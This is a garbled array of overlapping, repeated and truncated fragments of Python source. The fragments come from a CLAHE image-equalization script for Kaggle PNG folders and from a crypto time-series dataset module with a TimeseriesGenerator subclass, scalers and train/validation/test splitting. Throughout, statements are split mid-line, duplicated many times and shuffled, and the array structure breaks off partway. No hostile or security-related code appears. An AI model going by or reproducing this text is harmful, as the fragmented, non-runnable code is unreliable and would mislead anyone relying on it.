"dir_i + '-clahe' if not os.path.exists(save_dir): os.mkdir(save_dir) for f in os.listdir(dir_i): fname =",
"os.path.join(parent, dir_i) save_dir = dir_i + '-clahe' if not os.path.exists(save_dir): os.mkdir(save_dir) for f",
"fname = os.fsdecode(f) if fname.endswith(\".png\"): im = np.array(Image.open(os.path.join(dir_i, fname))) if len(im.shape) > 2:",
"# normalize to [0,1] im /= 255. im = equalize_adapthist(im) im = np.uint8(im*255)",
"'neg-filt-png', 'pos-filt-png'] for dir_i in folders: dir_i = os.path.join(parent, dir_i) save_dir = dir_i",
"'pos-all-png', 'test-png', 'train-png', 'neg-filt-png', 'pos-filt-png'] for dir_i in folders: dir_i = os.path.join(parent, dir_i)",
"os.fsdecode(f) if fname.endswith(\".png\"): im = np.array(Image.open(os.path.join(dir_i, fname))) if len(im.shape) > 2: im =",
"plt parent = '/data/Kaggle' folders = [ 'pos-all-png', 'test-png', 'train-png', 'neg-filt-png', 'pos-filt-png'] for",
"fname))) if len(im.shape) > 2: im = im[..., 0] im = im.astype(np.float) #",
"import os from matplotlib import pyplot as plt parent = '/data/Kaggle' folders =",
"for f in os.listdir(dir_i): fname = os.fsdecode(f) if fname.endswith(\".png\"): im = np.array(Image.open(os.path.join(dir_i, fname)))",
"-*- coding: utf-8 -*- \"\"\" Created on Wed Aug 21 14:21:03 2019 @author:",
"os.listdir(dir_i): fname = os.fsdecode(f) if fname.endswith(\".png\"): im = np.array(Image.open(os.path.join(dir_i, fname))) if len(im.shape) >",
"= [ 'pos-all-png', 'test-png', 'train-png', 'neg-filt-png', 'pos-filt-png'] for dir_i in folders: dir_i =",
"'test-png', 'train-png', 'neg-filt-png', 'pos-filt-png'] for dir_i in folders: dir_i = os.path.join(parent, dir_i) save_dir",
"if fname.endswith(\".png\"): im = np.array(Image.open(os.path.join(dir_i, fname))) if len(im.shape) > 2: im = im[...,",
"im = im[..., 0] im = im.astype(np.float) # normalize to [0,1] im /=",
"not os.path.exists(save_dir): os.mkdir(save_dir) for f in os.listdir(dir_i): fname = os.fsdecode(f) if fname.endswith(\".png\"): im",
"in os.listdir(dir_i): fname = os.fsdecode(f) if fname.endswith(\".png\"): im = np.array(Image.open(os.path.join(dir_i, fname))) if len(im.shape)",
"folders: dir_i = os.path.join(parent, dir_i) save_dir = dir_i + '-clahe' if not os.path.exists(save_dir):",
"import pyplot as plt parent = '/data/Kaggle' folders = [ 'pos-all-png', 'test-png', 'train-png',",
"np.array(Image.open(os.path.join(dir_i, fname))) if len(im.shape) > 2: im = im[..., 0] im = im.astype(np.float)",
"= '/data/Kaggle' folders = [ 'pos-all-png', 'test-png', 'train-png', 'neg-filt-png', 'pos-filt-png'] for dir_i in",
"Wed Aug 21 14:21:03 2019 @author: tjb129 \"\"\" import numpy as np from",
"coding: utf-8 -*- \"\"\" Created on Wed Aug 21 14:21:03 2019 @author: tjb129",
"len(im.shape) > 2: im = im[..., 0] im = im.astype(np.float) # normalize to",
"on Wed Aug 21 14:21:03 2019 @author: tjb129 \"\"\" import numpy as np",
"im.astype(np.float) # normalize to [0,1] im /= 255. im = equalize_adapthist(im) im =",
"<gh_stars>0 #!/usr/bin/env python3 # -*- coding: utf-8 -*- \"\"\" Created on Wed Aug",
"'/data/Kaggle' folders = [ 'pos-all-png', 'test-png', 'train-png', 'neg-filt-png', 'pos-filt-png'] for dir_i in folders:",
"f in os.listdir(dir_i): fname = os.fsdecode(f) if fname.endswith(\".png\"): im = np.array(Image.open(os.path.join(dir_i, fname))) if",
"'pos-filt-png'] for dir_i in folders: dir_i = os.path.join(parent, dir_i) save_dir = dir_i +",
"as np from PIL import Image from skimage.exposure import equalize_adapthist import os from",
"\"\"\" import numpy as np from PIL import Image from skimage.exposure import equalize_adapthist",
"if len(im.shape) > 2: im = im[..., 0] im = im.astype(np.float) # normalize",
"normalize to [0,1] im /= 255. im = equalize_adapthist(im) im = np.uint8(im*255) im2",
"from PIL import Image from skimage.exposure import equalize_adapthist import os from matplotlib import",
"21 14:21:03 2019 @author: tjb129 \"\"\" import numpy as np from PIL import",
"Created on Wed Aug 21 14:21:03 2019 @author: tjb129 \"\"\" import numpy as",
"import numpy as np from PIL import Image from skimage.exposure import equalize_adapthist import",
"dir_i = os.path.join(parent, dir_i) save_dir = dir_i + '-clahe' if not os.path.exists(save_dir): os.mkdir(save_dir)",
"os.mkdir(save_dir) for f in os.listdir(dir_i): fname = os.fsdecode(f) if fname.endswith(\".png\"): im = np.array(Image.open(os.path.join(dir_i,",
"im = np.array(Image.open(os.path.join(dir_i, fname))) if len(im.shape) > 2: im = im[..., 0] im",
"Image from skimage.exposure import equalize_adapthist import os from matplotlib import pyplot as plt",
"0] im = im.astype(np.float) # normalize to [0,1] im /= 255. im =",
"+ '-clahe' if not os.path.exists(save_dir): os.mkdir(save_dir) for f in os.listdir(dir_i): fname = os.fsdecode(f)",
"utf-8 -*- \"\"\" Created on Wed Aug 21 14:21:03 2019 @author: tjb129 \"\"\"",
"im[..., 0] im = im.astype(np.float) # normalize to [0,1] im /= 255. im",
"dir_i in folders: dir_i = os.path.join(parent, dir_i) save_dir = dir_i + '-clahe' if",
"matplotlib import pyplot as plt parent = '/data/Kaggle' folders = [ 'pos-all-png', 'test-png',",
"= im.astype(np.float) # normalize to [0,1] im /= 255. im = equalize_adapthist(im) im",
"pyplot as plt parent = '/data/Kaggle' folders = [ 'pos-all-png', 'test-png', 'train-png', 'neg-filt-png',",
"for dir_i in folders: dir_i = os.path.join(parent, dir_i) save_dir = dir_i + '-clahe'",
"tjb129 \"\"\" import numpy as np from PIL import Image from skimage.exposure import",
"os from matplotlib import pyplot as plt parent = '/data/Kaggle' folders = [",
"from skimage.exposure import equalize_adapthist import os from matplotlib import pyplot as plt parent",
"2: im = im[..., 0] im = im.astype(np.float) # normalize to [0,1] im",
"\"\"\" Created on Wed Aug 21 14:21:03 2019 @author: tjb129 \"\"\" import numpy",
"> 2: im = im[..., 0] im = im.astype(np.float) # normalize to [0,1]",
"#!/usr/bin/env python3 # -*- coding: utf-8 -*- \"\"\" Created on Wed Aug 21",
"as plt parent = '/data/Kaggle' folders = [ 'pos-all-png', 'test-png', 'train-png', 'neg-filt-png', 'pos-filt-png']",
"to [0,1] im /= 255. im = equalize_adapthist(im) im = np.uint8(im*255) im2 =",
"in folders: dir_i = os.path.join(parent, dir_i) save_dir = dir_i + '-clahe' if not",
"numpy as np from PIL import Image from skimage.exposure import equalize_adapthist import os",
"parent = '/data/Kaggle' folders = [ 'pos-all-png', 'test-png', 'train-png', 'neg-filt-png', 'pos-filt-png'] for dir_i",
"= os.path.join(parent, dir_i) save_dir = dir_i + '-clahe' if not os.path.exists(save_dir): os.mkdir(save_dir) for",
"im /= 255. im = equalize_adapthist(im) im = np.uint8(im*255) im2 = Image.fromarray(im) im2.save(os.path.join(save_dir,",
"'train-png', 'neg-filt-png', 'pos-filt-png'] for dir_i in folders: dir_i = os.path.join(parent, dir_i) save_dir =",
"-*- \"\"\" Created on Wed Aug 21 14:21:03 2019 @author: tjb129 \"\"\" import",
"skimage.exposure import equalize_adapthist import os from matplotlib import pyplot as plt parent =",
"= np.array(Image.open(os.path.join(dir_i, fname))) if len(im.shape) > 2: im = im[..., 0] im ="
] |
[
"length self.sampling_rate = sampling_rate self.stride = stride self.start_index = start_index + length self.overlap",
"val_len, test_len = self.split_data_df() if test_len is None: x_Train_data = x_arr[train_len:, :] x_Val_data",
"step.' % (self.start_index, self.end_index)) self.sample_shape = self.calc_shape() pass def calc_shape(self): index = 0",
"str = '' self.dataset_profile = DSProfile() self.features_df = None self.y_df = None self.x_Train",
"self.features.create_power_trend(weight) self.create_power_trend() return self.dataset else: msg = \"Error: Unknown dataset preparation type\" sys.exit(msg)",
"= self.dataset.y_df.values.reshape(-1, 1) if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = RobustScaler().fit(y_temp)",
"self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :] y_Test_data = y_arr[x_arr.shape[0] - test_len:, :] x_Test_gen",
"self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = None else: msg = \"Error:",
"import OneHotEncoder from sklearn.preprocessing import FunctionTransformer from tensorflow.keras.preprocessing.sequence import TimeseriesGenerator import matplotlib.pyplot as",
"-> DataSet: self.dataset.dataset_profile = DSProfile() self.dataset.features_df = self.features.collect_features(self.dataset_profile) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' if self.dataset_profile.Y_data",
"time.altzone / 3600 else: offset_hour = time.timezone / 3600 offset_hour_msg = f\"{offset_hour:.0f}\" if",
"if (self.x_Test is not None) and (self.y_Test is not None): return self.x_Test, self.y_Test",
"y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def create_power_trend(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler",
"= None self.x_Val = None self.y_Val = None self.x_Test = None self.y_Test =",
"self.batch_size = batch_size self.sample_shape = None if self.start_index > self.end_index: raise ValueError('`start_index+length=%i >",
"np.array([self.data[row - self.overlap - self.length:row:self.sampling_rate] for row in rows]) # self.sample_shape = np.expand_dims(samples,",
"self.get_train_generator(x_Train_data, y_Train_data) x_Val_gen = self.get_val_generator(x_Val_data, y_Val_data) self.dataset.x_Train, self.dataset.y_Train = self.create_data_from_gen(x_Train_data, y_Train_data) self.dataset.x_Val, self.dataset.y_Val",
"1, size=self.batch_size) else: i = (self.start_index + self.batch_size * self.stride * index) rows",
"= (\"BTCUSDT\", \"ETHUSDT\") -> Use only this pairs to load time_intervals = None",
"ValueError('`start_index+length=%i > end_index=%i` ' 'is disallowed, as no part of the sequence '",
"self.features_df = None self.y_df = None self.x_Train = None self.y_Train = None self.x_Val",
"this list to load start_period = None -> Use from [0:] of historical",
"0 i = (self.start_index + self.batch_size * self.stride * index) rows = np.arange(i,",
"start_period='2021-11-01 00:00:00', end_period='2021-12-05 23:59:59', ) dataset_1_profile = DSProfile() dsc = DSCreator(loaded_crypto_data, dataset_1_profile) dataset_1_cls",
"- (df_train_len + self.dataset_profile.gap_timeframes) self.dataset.train_df = self.dataset.features_df.iloc[:df_train_len, :] if self.dataset_profile.train_size + self.dataset_profile.val_size ==",
"self.start_index = start_index + length self.overlap = overlap if end_index is None: end_index",
"= y_arr[:train_len + self.dataset_profile.gap_timeframes, :] else: x_Train_data = x_arr[train_len:, :] x_Val_data = x_arr[train_len",
"Use from [0:] of historical data start_period = '2021-09-01 00:00:00' -> Use from",
"3600 offset_hour_msg = f\"{offset_hour:.0f}\" if offset_hour > 0: offset_hour_msg = f\"+{offset_hour:.0f}\" return f'Etc/GMT{offset_hour_msg}'",
"self.shuffle: rows = np.random.randint( self.start_index, self.end_index + 1, size=self.batch_size) else: i = (self.start_index",
"timeframes). All data with chosen period loaded to memory Args: loader (DataLoad): object",
"end_index = len(data) - 1 self.end_index = end_index self.shuffle = shuffle self.reverse =",
"else: msg = \"Error: Unknown dataset preparation type\" sys.exit(msg) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' y_temp",
"this pairs to load time_intervals = None -> Use all timeframes directories for",
"-> Use until this datetimeindex source_directory=\"../source_root\" -> Use this directory to search timeframes",
"None self.y_Test = None self.features_scaler = object self.targets_scaler = object self.train_gen = None",
"= self.dataset.dataset_profile.power_trend self.dataset.y_df = self.features.create_power_trend(weight) self.create_power_trend() return self.dataset else: msg = \"Error: Unknown",
"stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.test_gen def create_close1_close2_power(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler",
"- self.overlap - self.length:row:self.sampling_rate] for row in rows]) # self.sample_shape = np.expand_dims(samples, axis=0).shape",
"weight = self.dataset.dataset_profile.power_trend self.dataset.y_df = self.features.create_power_trend(weight) self.create_power_trend() return self.dataset else: msg = \"Error:",
"overlap=0, end_index=None, shuffle=False, reverse=False, batch_size=128): super().__init__(data, targets, length, sampling_rate, stride, start_index, end_index, shuffle,",
"= f\"+{offset_hour:.0f}\" return f'Etc/GMT{offset_hour_msg}' class TSDataGenerator(TimeseriesGenerator): def __init__(self, data, targets, length, sampling_rate=1, stride=1,",
"= self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using generator 1 time to have solid data \"\"\"",
"offset_hour_msg = f\"{offset_hour:.0f}\" if offset_hour > 0: offset_hour_msg = f\"+{offset_hour:.0f}\" return f'Etc/GMT{offset_hour_msg}' class",
"self.overlap - self.length:row:self.sampling_rate] for row in rows]) # self.sample_shape = samples.shape targets =",
"= self.dataset.features_df.shape[0] df_train_len = int(df_rows * self.dataset_profile.train_size) df_val_len = df_rows - (df_train_len +",
"return samples[:, ::-1, ...], targets return samples, targets @dataclass class DataSet: def __init__(self):",
"if self.dataset_profile.train_size + self.dataset_profile.val_size == 1.0: self.dataset.val_df = self.dataset.features_df.iloc[df_train_len + self.dataset_profile.gap_timeframes:, :] return",
"self.dataset_profile.gap_timeframes + val_len, :] x_Test_data = x_arr[x_arr.shape[0] - test_len:, :] y_Train_data = y_arr[train_len:,",
"directories for loading (with pairs_symbols) time_intervals = ['15m'] -> Use timeframes from this",
"split_data_df(self): df_rows = self.dataset.features_df.shape[0] df_train_len = int(df_rows * self.dataset_profile.train_size) df_val_len = df_rows -",
") return self.dataset.test_gen def create_close1_close2_power(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler",
"chosen period loaded to memory Args: loader (DataLoad): object with data Returns: DSCreator",
"sklearn.preprocessing import LabelBinarizer from sklearn.preprocessing import OneHotEncoder from sklearn.preprocessing import FunctionTransformer from tensorflow.keras.preprocessing.sequence",
"targets, length, sampling_rate, stride, start_index, end_index, shuffle, reverse, batch_size) if len(data) != len(targets):",
"create_data_from_gen(self, x_arr, y_arr): gen = TSDataGenerator(data=x_arr, targets=y_arr, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, batch_size=x_arr.shape[0]",
"Use until this datetimeindex source_directory=\"../source_root\" -> Use this directory to search timeframes directory",
"sns import tensorflow as tf from dataclasses import dataclass from analyze.dataload import DataLoad",
"start_index, end_index, shuffle, reverse, batch_size) if len(data) != len(targets): raise ValueError('Data and targets",
"object self.train_gen = None self.val_gen = None self.test_gen = None self.input_shape = None",
"DataLoad, dataset_profile: DSProfile): \"\"\" Getting object with OHLCV data (symbols and timeframes). All",
"def save_dataset_arrays(self, path_filename): pass if __name__ == \"__main__\": \"\"\" Usage for DataLoad class",
"if overlap > 0: start_index += overlap self.data = data self.targets = targets",
"= np.array([self.targets[row] for row in rows]) if self.reverse: return samples[:, ::-1, ...], targets",
"row in rows]) if self.reverse: return samples[:, ::-1, ...], targets return samples, targets",
"if self.reverse: return samples[:, ::-1, ...], targets return samples, targets @dataclass class DataSet:",
"self.x_Train = None self.y_Train = None self.x_Val = None self.y_Val = None self.x_Test",
"data with chosen period loaded to memory Args: loader (DataLoad): object with data",
"val_len, :] x_Test_data = x_arr[x_arr.shape[0] - test_len:, :] y_Train_data = y_arr[train_len:, :] y_Val_data",
"* self.dataset_profile.val_size) df_test_len = df_rows - (df_train_len + self.dataset_profile.gap_timeframes) - (df_val_len + self.dataset_profile.gap_timeframes)",
"Use this directory to search timeframes directory \"\"\" loaded_crypto_data = DataLoad(pairs_symbols=None, time_intervals=['15m'], source_directory=\"../source_root\",",
"is {}'.format(len(targets))) if overlap >= length: raise ValueError(f'`overlap={overlap} >= length={length}` is disallowed') if",
"dataset_profile self.dataset = DataSet() def split_data_df(self): df_rows = self.dataset.features_df.shape[0] df_train_len = int(df_rows *",
"DSProfile __version__ = 0.0010 def get_local_timezone_name(): if time.daylight: offset_hour = time.altzone / 3600",
"self.dataset_profile.Y_data == \"close1-close2_trend\": self.dataset.y_df = self.features.create_y_close1_close2_sub_trend() self.create_close1_close2_trend() return self.dataset elif self.dataset_profile.Y_data == \"close1-close2_power\":",
"length, sampling_rate, stride, start_index, end_index, shuffle, reverse, batch_size) if len(data) != len(targets): raise",
"__version__ = 0.0010 def get_local_timezone_name(): if time.daylight: offset_hour = time.altzone / 3600 else:",
"self.dataset.features_df.shape[0] df_train_len = int(df_rows * self.dataset_profile.train_size) df_val_len = df_rows - (df_train_len + self.dataset_profile.gap_timeframes)",
"sklearn.preprocessing import FunctionTransformer from tensorflow.keras.preprocessing.sequence import TimeseriesGenerator import matplotlib.pyplot as plt import seaborn",
"== 1.0: self.dataset.val_df = self.dataset.features_df.iloc[df_train_len + self.dataset_profile.gap_timeframes:, :] return df_train_len, df_val_len, None else:",
"f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' if self.dataset_profile.Y_data == \"close1-close2\": self.dataset.y_df = self.features.create_y_close1_close2_sub() elif self.dataset_profile.Y_data == \"close1-close2_trend\": self.dataset.y_df",
"is None: end_index = len(data) - 1 self.end_index = end_index self.shuffle = shuffle",
"start_period = '2021-09-01 00:00:00' -> Use from this datetimeindex end_period = None ->",
"self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = None else: msg = \"Error: Unknown scaler preparation",
"start_index=0, overlap=0, end_index=None, shuffle=False, reverse=False, batch_size=128): super().__init__(data, targets, length, sampling_rate, stride, start_index, end_index,",
"None else: msg = \"Error: Unknown scaler preparation type\" sys.exit(msg) x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values)",
"x_Val_data = x_arr[:train_len + self.dataset_profile.gap_timeframes, :] y_Train_data = y_arr[train_len:, :] y_Val_data = y_arr[:train_len",
"== \"__main__\": \"\"\" Usage for DataLoad class ------------------------ pairs_symbol = None -> Use",
"start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.train_gen def get_val_generator(self, x_Val_data, y_Val_data): self.dataset.val_gen = TSDataGenerator(data=x_Val_data, targets=y_Val_data,",
"np.expand_dims(samples, axis=0).shape sample_shape = (samples.shape[-2], samples.shape[-1],) return sample_shape def __getitem__(self, index): if self.shuffle:",
"self.sampling_rate = sampling_rate self.stride = stride self.start_index = start_index + length self.overlap =",
"sequence ' 'would be left to be used as current step.' % (self.start_index,",
"if (self.x_Train is not None) and (self.y_Train is not None): return self.x_Train, self.y_Train",
"df_train_len + self.dataset_profile.gap_timeframes, :] self.dataset.test_df = self.dataset.features_df.iloc[df_rows - df_test_len:, :] return df_train_len, df_val_len,",
":] y_Train_data = y_arr[train_len:, :] y_Val_data = y_arr[:train_len + self.dataset_profile.gap_timeframes, :] else: x_Train_data",
"TSDataGenerator(data=x_Test_data, targets=y_Test_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.test_gen def create_close1_close2_power(self): if",
"samples[:, ::-1, ...], targets return samples, targets @dataclass class DataSet: def __init__(self): self.name:",
"= None if self.start_index > self.end_index: raise ValueError('`start_index+length=%i > end_index=%i` ' 'is disallowed,",
"\"power_trend\": weight = self.dataset.dataset_profile.power_trend self.dataset.y_df = self.features.create_power_trend(weight) self.create_power_trend() return self.dataset else: msg =",
"= df_rows - (df_train_len + self.dataset_profile.gap_timeframes) - (df_val_len + self.dataset_profile.gap_timeframes) self.dataset.val_df = self.dataset.features_df.iloc[",
"= self.features.collect_features(self.dataset_profile) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' if self.dataset_profile.Y_data == \"close1-close2\": self.dataset.y_df = self.features.create_y_close1_close2_sub() elif",
"df_train_len + self.dataset_profile.gap_timeframes: df_val_len + df_train_len + self.dataset_profile.gap_timeframes, :] self.dataset.test_df = self.dataset.features_df.iloc[df_rows -",
"= None self.y_Val = None self.x_Test = None self.y_Test = None self.features_scaler =",
"Class for dataset creation for dataset configuration we are using DSConstants dataclass (profile)",
"None -> Use all pairs in timeframe directory pairs_symbol = (\"BTCUSDT\", \"ETHUSDT\") ->",
"self.batch_size * self.stride * index) rows = np.arange(i, min(i + self.batch_size * self.stride,",
"not None): return self.x_Train, self.y_Train def get_val(self): if (self.x_Val is not None) and",
"df_rows = self.dataset.features_df.shape[0] df_train_len = int(df_rows * self.dataset_profile.train_size) df_val_len = df_rows - (df_train_len",
"typing import Tuple from sklearn.preprocessing import StandardScaler from sklearn.preprocessing import MinMaxScaler from sklearn.preprocessing",
"= self.features.create_y_close1_close2_sub_trend() self.create_close1_close2_trend() return self.dataset elif self.dataset_profile.Y_data == \"close1-close2_power\": self.dataset.y_df = self.features.create_y_close1_close2_sub_power() self.create_close1_close2_power()",
"self.features.create_y_close1_close2_sub() elif self.dataset_profile.Y_data == \"close1-close2_trend\": self.dataset.y_df = self.features.create_y_close1_close2_sub_trend() self.create_close1_close2_trend() return self.dataset elif self.dataset_profile.Y_data",
"1 self.end_index = end_index self.shuffle = shuffle self.reverse = reverse self.batch_size = batch_size",
"y_arr) pass def create_power_trend(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler =",
"test_len:, :] y_Train_data = y_arr[train_len:, :] y_Val_data = y_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes",
"> end_index=%i` ' 'is disallowed, as no part of the sequence ' 'would",
"continue return x_data, y_data def save_dataset_arrays(self, path_filename): pass if __name__ == \"__main__\": \"\"\"",
"f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' y_temp = self.dataset.y_df.values.reshape(-1, 1) if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler",
") for x_data, y_data in gen: continue return x_data, y_data def save_dataset_arrays(self, path_filename):",
"create_close1_close2_trend(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = None else: msg",
"(self.start_index + self.batch_size * self.stride * index) rows = np.arange(i, min(i + self.batch_size",
"import os import sys import time import copy import pytz import numpy as",
"return self.dataset.train_gen def get_val_generator(self, x_Val_data, y_Val_data): self.dataset.val_gen = TSDataGenerator(data=x_Val_data, targets=y_Val_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride,",
"if __name__ == \"__main__\": \"\"\" Usage for DataLoad class ------------------------ pairs_symbol = None",
"pd from typing import Tuple from sklearn.preprocessing import StandardScaler from sklearn.preprocessing import MinMaxScaler",
"get_local_timezone_name(): if time.daylight: offset_hour = time.altzone / 3600 else: offset_hour = time.timezone /",
"self.dataset.features_df.iloc[df_rows - df_test_len:, :] return df_train_len, df_val_len, df_test_len def get_train_generator(self, x_Train_data, y_Train_data): self.dataset.train_gen",
"self.targets = targets self.length = length self.sampling_rate = sampling_rate self.stride = stride self.start_index",
"x_Train_data = x_arr[train_len:, :] x_Val_data = x_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len,",
"'Data length is {}'.format(len(data)) + ' while target length is {}'.format(len(targets))) if overlap",
"y_arr[train_len:, :] y_Val_data = y_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :] y_Test_data",
"object with data Returns: DSCreator (class): object \"\"\" self.features = DataFeatures(loader) self.dataset_profile =",
"pass def create_power_trend(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = None",
"min(i + self.batch_size * self.stride, self.end_index + 1), self.stride) samples = np.array([self.data[row -",
"from dataclasses import dataclass from analyze.dataload import DataLoad from datamodeling.datafeatures import DataFeatures, DSProfile",
"if test_len is None: x_Train_data = x_arr[train_len:, :] x_Val_data = x_arr[:train_len + self.dataset_profile.gap_timeframes,",
"\"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def create_close1_close2_trend(self): if self.dataset_profile.scaler == \"robust\":",
"import DataFeatures, DSProfile __version__ = 0.0010 def get_local_timezone_name(): if time.daylight: offset_hour = time.altzone",
"as no part of the sequence ' 'would be left to be used",
"as pd from typing import Tuple from sklearn.preprocessing import StandardScaler from sklearn.preprocessing import",
"sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.train_gen def get_val_generator(self, x_Val_data, y_Val_data): self.dataset.val_gen =",
"import TimeseriesGenerator import matplotlib.pyplot as plt import seaborn as sns import tensorflow as",
"index): if self.shuffle: rows = np.random.randint( self.start_index, self.end_index + 1, size=self.batch_size) else: i",
"= (self.start_index + self.batch_size * self.stride * index) rows = np.arange(i, min(i +",
"DSProfile() self.features_df = None self.y_df = None self.x_Train = None self.y_Train = None",
"(symbols and timeframes). All data with chosen period loaded to memory Args: loader",
"(self.y_Train is not None): return self.x_Train, self.y_Train def get_val(self): if (self.x_Val is not",
"no part of the sequence ' 'would be left to be used as",
"is disallowed') if overlap > 0: start_index += overlap self.data = data self.targets",
"DataSet: def __init__(self): self.name: str = '' self.dataset_profile = DSProfile() self.features_df = None",
"is not None): return self.x_Val, self.y_Val def get_test(self): if (self.x_Test is not None)",
"self.prepare_datagens(x_arr, y_arr) return self.dataset def create_data_from_gen(self, x_arr, y_arr): gen = TSDataGenerator(data=x_arr, targets=y_arr, length=self.dataset_profile.tsg_window_length,",
"self.length = length self.sampling_rate = sampling_rate self.stride = stride self.start_index = start_index +",
"RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = RobustScaler().fit(y_temp) else: msg = \"Error: Unknown scaler preparation type\" sys.exit(msg)",
"rows]) # self.sample_shape = np.expand_dims(samples, axis=0).shape sample_shape = (samples.shape[-2], samples.shape[-1],) return sample_shape def",
"timeframes directories for loading (with pairs_symbols) time_intervals = ['15m'] -> Use timeframes from",
"x_Train_data, y_Train_data): self.dataset.train_gen = TSDataGenerator(data=x_Train_data, targets=y_Train_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return",
"elif self.dataset_profile.Y_data == \"close1-close2_power\": self.dataset.y_df = self.features.create_y_close1_close2_sub_power() self.create_close1_close2_power() return self.dataset elif self.dataset_profile.Y_data ==",
"import DataLoad from datamodeling.datafeatures import DataFeatures, DSProfile __version__ = 0.0010 def get_local_timezone_name(): if",
"length, sampling_rate=1, stride=1, start_index=0, overlap=0, end_index=None, shuffle=False, reverse=False, batch_size=128): super().__init__(data, targets, length, sampling_rate,",
"and (self.y_Train is not None): return self.x_Train, self.y_Train def get_val(self): if (self.x_Val is",
"None else: df_val_len = int(df_rows * self.dataset_profile.val_size) df_test_len = df_rows - (df_train_len +",
"= shuffle self.reverse = reverse self.batch_size = batch_size self.sample_shape = None if self.start_index",
"batch_size self.sample_shape = None if self.start_index > self.end_index: raise ValueError('`start_index+length=%i > end_index=%i` '",
"= None self.features_scaler = object self.targets_scaler = object self.train_gen = None self.val_gen =",
"self.y_Test class DSCreator: \"\"\" Class for dataset creation for dataset configuration we are",
"- (df_val_len + self.dataset_profile.gap_timeframes) self.dataset.val_df = self.dataset.features_df.iloc[ df_train_len + self.dataset_profile.gap_timeframes: df_val_len + df_train_len",
"data start_period = '2021-09-01 00:00:00' -> Use from this datetimeindex end_period = None",
"get_test_generator(self, x_Test_data, y_Test_data): self.dataset.test_gen = TSDataGenerator(data=x_Test_data, targets=y_Test_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, )",
"= None self.test_gen = None self.input_shape = None pass def get_train(self): if (self.x_Train",
"\"\"\" loaded_crypto_data = DataLoad(pairs_symbols=None, time_intervals=['15m'], source_directory=\"../source_root\", start_period='2021-11-01 00:00:00', end_period='2021-12-05 23:59:59', ) dataset_1_profile =",
"= x_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :] x_Test_data = x_arr[x_arr.shape[0] -",
"self.dataset.input_shape = x_Val_gen.sample_shape pass def create_dataset(self) -> DataSet: self.dataset.dataset_profile = DSProfile() self.dataset.features_df =",
"self.dataset.y_Test = self.create_data_from_gen(x_Test_data, y_Test_data) # x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using generator 1",
"= ['15m'] -> Use timeframes from this list to load start_period = None",
"== \"close1-close2\": self.dataset.y_df = self.features.create_y_close1_close2_sub() elif self.dataset_profile.Y_data == \"close1-close2_trend\": self.dataset.y_df = self.features.create_y_close1_close2_sub_trend() self.create_close1_close2_trend()",
